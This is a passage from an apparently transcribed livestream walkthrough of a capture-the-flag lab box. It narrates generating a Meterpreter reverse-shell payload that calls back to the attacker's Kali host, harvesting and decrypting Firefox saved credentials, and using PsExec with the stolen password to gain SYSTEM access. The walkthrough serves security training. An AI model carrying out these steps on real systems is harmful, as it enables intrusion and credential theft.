ahead and exit out of here. Okay. That's all closed out. Let's go ahead and set our L host to our Kali Linux machine now. We'll type in run. Same 1337. Everything's the same, right? Let's go ahead and grab that payload. Go back to Sublime Text. Throw that payload into here. Save. Control S a whole bunch of times. A million times, okay? We can stop that guy up there. And let's go ahead and change out my IP address up here. This IP. Port's still going to be the same, right? To the Kali box IP. So 10.10.130.144. Save that 8 million times. And supposedly this should work. And it does. ID, or who am I? Alright, who am I / priv. And cool, so we got this, right? Now, is this stable? Maybe, you know, maybe it is. So let's go ahead and make something a little more stable here. MSF Venom. Attack P. Let's do a Windows interpreter, right? Reverse TCP. Yeah, we'll have the L host 10.98.166, L port 999. We'll call it test.exe. Sure, why not, right? And let's go ahead and Control Z on this guy. Yes. You will search for shell 2, because then we get shell 2 interpreter. Use 0. Sessions tag I. Set session to 2. We'll go ahead and run that, and hopefully we can get an interpreter session up and running so we can just upload this test.exe. That would be freaking sweet. Alright, there's my test.exe, and let's go ahead and see if we can get that guy up and running. PWD, sessions 3. We got an interpreter session, PWD. We should be good, so let's go ahead and upload test.exe in here. Hopefully that uploads. Alright, it uploaded. Let's go ahead and Control Z. We'll background this session. Use exploit multi-handler again. Set the payload to Windows interpreter reverse TCP. Now, one thing I do want to remind you guys, okay, is that just because this was a 32-bit exploit doesn't mean that this is 32-bit Windows. Right? You do want to do a little more recon on the Windows machine, stuff like that, because it might not be 32-bit, it might be 64-bit Windows. Okay, but we'll set the payload to that. All right, we'll do a we'll set our L port to 9999 now. Go ahead and run that. I should actually do a run tag. We'll do a run tag J. There we go. Sessions 3. So now it's running in the background, right? And we'll go ahead and try to run. We'll do a shell, and we'll try to run test.exe there. Test.exe. Sending stage, and interpreter session 4 just opened up. And then we can also do a type for user text. Okay, and we got half the way there. So now we have another shell, an interpreter shell open, right? So now we have 2 shells open on this guy, just in case he decides to get out of one. And let's go ahead and see. It is get through the fire, right? So I think that has something to do with Firefox, especially since there's a Firefox link on his desktop. So let's go ahead and Control Z out of here. Yes. Let's go ahead and try to do a get system. Can we do that? Nope. Okay, we can't do that. That's okay. Need a little kiwi into here. Alright, 100% can. We loaded kiwi, right? Let's go ahead and actually Control Z out of here and get into my session that I created. Session tag I. We'll get into this session 4. Alright, and then we'll do a run, and it should be, yes, list all the possibilities that you possibly can. Run, it might be new Firefox, because we're pretty sure Firefox is on there. And then we also have post multi-gather Firefox credentials. Okay, so let's go ahead and run the new Firefox first, see if we can do anything with this. Alright, scripts are appreciated. Okay, so it says run post Windows. Okay, so we want us to run that. Let's go ahead and run that. So sorry, such script cannot be found. Post Windows gather enum Firefox. Actually, we want to do a run. It wasn't even that. None of those two are actually working like right there. So we'll do a run multi-gather. What is that? No, it's post multi-gather Firefox creds. There we go. Run him. Post multi-gather Firefox creds. Let's see if we can grab those credentials, bring them back down to us, see if we can do anything with those. Alright. Then you can see what does Firefox actually keep in them and everything like that. So, if you guys follow along, we did our first exploit on Windows using Python on this channel. We've already done this one, the same box thing with long-range.json. Okay, so we have everything that we need. We did the same box with Ruby, so I do have a video on Ruby for this also, which I actually like Ruby a little bit better for this one at least, but that's okay. So we have a JSON logins.json file like right here. Alright, let's go ahead and cat that. Okay, so that's our logins.json file. Alright, we have a key 4, we have cert9.db, and we also looks like we have some cookies. Let's try that guy. Got those cookies, okay. Nice, whatever. Alright, cool. So there is a Firefox. We go to CD here, and we go to CD in a Firefox. There is a Firefox attack for gathering credentials. That is something that you can do. Alright. We've already gained our initial access and everything, so now all we have to do is just kind of crack these credentials. Now, cracking these credentials, I've actually never done this before. So, I may have to look up like how to actually utilize this guy like right here, like how to utilize Firefox decrypt. So let's go ahead and try that. How to use Firefox decrypt. Okay. Firefox decrypt is a tool to extract passwords. How do I use this guy? Because I've never actually used him. How to retrieve and decrypt stored passwords in Firefox. Yes, let's see. We done did, okay, we did that. We got our logins.json. Yep, we did that. We have those 4 files. That's Those are facts. Okay. The files have been renamed to .bin. Just rename them to the original extension. Okay, so we want to rename them to the original extensions. Let's go ahead and copy those over into my machine now, right? You guys see all this, right? Yeah, you guys can. Okay. I'll make sure it wasn't on like the Windows machine doing all this stuff. So let's go ahead and put him over here like that. We'll take this guy, we'll put him over here like that, and we'll go ahead and copy all those over. So let me go ahead and CD into, and then what? Okay, Firefox decrypt. I think I'm actually just gonna put them right in here. I think I'm gonna copy this whole thing, and that's logins JSON to here, and then we're going to move that whole thing to logins.json. Alright, and then we'll do that same thing with what else? Did he do it with all of them? Yeah, he did it with all of them. Okay, so let's go ahead and do that with key 4. We'll move that to here, and then we'll, whoopsie daisy, I did not want to do that. Yeah, I think, okay, I'm good. Move that to key 4.db. Okay. Oh, whoopsie daisy. Okay, yeah, I am all messed up, aren't I? The first one, what are you? 2021, 835. 835, your logins.json. Okay, so I need to move you to logins.json. I need to move you to key 4.db. Whoops, move you right to key 4.db. Okay, now we need to copy over this cert9 guy, right? So we'll copy him over, or excuse me, cookies. Do I need that too? Yep. Okay, we'll go ahead and grab him. We'll go ahead and copy cookies over to here, and then we'll move this guy right here to cookies.sqlite, and then we'll do the last one, right? We'll copy him over, cert9, copy him over to here, and then we'll move him to cert9.db. So LA, I should have those 4 files in here. I have 1, 2, 3, 4. Cool, looks good. Alright, and now there's a manual on GitHub. Okay, download that guy. Yep, okay. Don't be stored Google Chrome password. Okay. Oh, do I just run it now? Mayor, I think Mayor is actually someone out of this box actually. I think, do I just run Python 3 Firefox? Is it even That's pretty cool that I grabbed my own stuff, but you grabbed my own stuff, but how do I now Python, so Python Firefox decrypt.py ms4 loot. See, he's going in there, so he moved them all there. I just want to do like right here, Firefox decrypt. Alright, cool, we got it. So we did that. So this one actually used the same exact thing that we actually had. Same exact box that we actually had. Then I have to like black out an area of this whole thing now. So everyone's probably like, trying to like rewind it like real quick and like, oh, what's this password? Now I have to change my password. Thanks a lot. This sucks. I decrypted my own Firefox keys though, that was fun. Alright, good thing nobody really watches these. Alright, so let's go ahead and we got that information. Now, what can we actually do with that? Can we actually, like, change who we are? Well, I guess I could also, since someone did ask, I guess I could also do this now, too, can I? Boom. Whoop. There you go, okay. Can we now change, like, so we've got the keys and everything, but can we now just change our user? You know what I'm saying? Like, what can we do with that information? That's what I'm trying to figure out. Like, what can we actually do we just have to change over to Mare, or can we use like unpack it or something like that? Because we have this information now, right? So, oh, we could use, I mean, we could just use MSF console, but we could also try to use unpack it. Here, 1 second. Let's search for PSEXEC, because we have this information like right here, right? So let's go ahead and try to do 10, use 10. Show options. Set L host to myself. L port's fine. Set SMB user to Mare. Set SMB pass to this, right? It shouldn't be pass file, it's just pass, right? It's not password or anything. No, okay. SMB pass to that, and then set the R host to this 10.10 130 144. Set R host to that. Whoops. Okay, that's not gonna work. 10.10 130.144, and try to run that. It's authenticating as the Mare. Selecting PowerShell target, executing the payload. Come on, big guy, you can do it. Can we also use locate PSEXEC.py? Can we also use that too, and then pack it? I think we can. Let's try to use both of these. So, okay, so we're in there. Who am I? Or get UID, excuse me. I'm NT Authority System now. So now I can PWD. In Systems 32. I guess I could probably go into the Mare now. Like where, I don't know where this other file is even at. Do a directory. I just did in System 32. That was dumb of me. It's going to go to shell, and we'll CD into, I guess, C drive. Directory CD into users. Directory CD into Mare. Directory, because he seems like he's the main guy. CD into desktop directory, and type out that root text.txt. And before we finish this off, we're going to try to do some packet also, and then we will be totally finished. Now, this is going to be one of the only ones where, we do extra beyond just grabbing, just getting that reverse shell also. So this is going to be one of the only ones that we actually go above and beyond anything. Let's go ahead and use or CD into /home Kali and packet build scripts 2.7. We'll do Python PSEXEC.py. I don't know what else it needs, okay? But so we have to put in obviously things called Python PSEX Gatekeeper that's Mare, because we gotta put it in like it's an SMB. Gatekeeper Mare, right? Gatekeeper Mare, because we're looking at it like it's SMB, and then we want to do the password of Mare, I believe. So the password of Mare was, I don't even freaking remember. That, right? So the password of Mare, right? And then from there we would have to do something like at password of Mare. Okay, target command. Domain, yep, /username, password at target name or address, command or argument if taxi is used to execute a target without path, default command.exe. Okay, so let's go ahead and just put in at the target name, which could be the IP address. So shift at the IP address, right? Hey, how that does that? Well, I could do ipconfig arptac-a. Throw it all in there. Let's do a little alright, that enter, and then it said default is just command executable, right? So this is without using Metasploit, like right here. Opening service manager, creating service. This is your PSEXEC, and it looks like we got in there also. We can CD and C there. Users, Mare, desktop, and then we can do a dir. I wonder if we just do a type with this too. We do a type root.text. Wonder if it still works the same, just as anything else does. And it does. So there you go. There's two ways to get in to escalate your privileges. Okay, and yeah, that's about it. So I hope you guys learned something with this. I hope you guys learned a little bit more about buffer overflows. I know I had fun. Hopefully it was just as exciting as it was for me to do. But we will continue to look at more buffer overflows. I'm thinking about next time we do this, we're going to go through and we are going to start doing the buffer overflow room, which is another, just if you just go to here, search overflow or buffer overflow prep. Alright, it is just going to be an absolutely insane amount of them, 10 of them in total. But we'll go ahead and we're going to start to go through some of these guys. Alright, because this is more of OSCP kind of related, okay? This one, it was extremely ECPPT related. The other one's OSCP related. But hopefully you guys like the stream. Like I said, we're going to try to be doing this, try to bust through these guys like crazy throughout September. And yeah, that should be about it. So if you guys got any questions, let me know. Send me a Discord or something like that. I'm going to bed. It's 10:32. I've been streaming for too long. You guys have a good one. Good night.